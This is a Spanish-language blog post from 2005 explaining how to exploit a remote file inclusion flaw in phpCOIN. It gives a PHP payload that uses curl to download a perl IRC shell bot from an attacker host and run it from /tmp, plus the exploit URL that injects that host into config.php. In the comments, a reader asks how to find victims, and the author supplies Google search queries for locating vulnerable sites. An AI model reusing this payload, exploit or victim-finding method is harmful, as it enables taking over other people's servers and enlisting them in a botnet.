ecoestadistica.com

jueves, diciembre 29, 2005

bug de phpCOIN - explicacion...

Esta vez incluire una explicacion para poder ejecutar comandos remotos a traves de un shell perl bot...
Lo primero que debemos hacer es crear en nuestro Host por ejemplo: www.hack.com un directorio llamado db_mysql.php y dentro de el un archivo llamado index.html, luego de crear este ultimo,ingresaremos el siguiente codigo:

?php
passthru("cd /tmp/;curl -o bot.txt http://www.hak.com/bot.txt; perl /tmp/bot.txt");
?

La ruta completa quedaria asi:
http://www.hak.com/db_mysql.php/index.html

Explicacion:
Lo que creamos es un archivo php con un llamado en este caso a curl (usaremos curl debido a que en la gran mayoria de los casos tenemos permisos de ejecucion, mas que usando el wget) que baja un archivo en este caso un shell bot y luego lo ejecuta.

Lo unico que tendriamos que cambiar es: http://www.hak.com/bot.txt por nuestra dir donde se encuentre el bot, el resto dejarlo asi como se encuentra.-

Manera de explotar: manualmente

http://www.server.com/config.php?_CCFG[_PKG_PATH_DBSE]=http://www.hak.com/

(No olvidar ingresar la barra / al final ya que o funcionaria el exploit), luego de eso veremos entrar al bot en nuestro irc.

Bot: bajarlo desde la direccion que puse en un post anterior.

Salu2

2 Comments:

Anonymous Anónimo said...

como busco posibles victimas ¿

enero 31, 2006 4:43 a. m.  
Blogger Mousehack said...

podrias usar en google por ejemplo:

¨Powered By phpCOIN 1.2.2¨

o tambien:

inurl:login.php?w=admin intitle:"Site Login" "Powered By phpCOIN"

Salu2

enero 31, 2006 12:30 p. m.  

Publicar un comentario

<< Home

ecoestadistica.com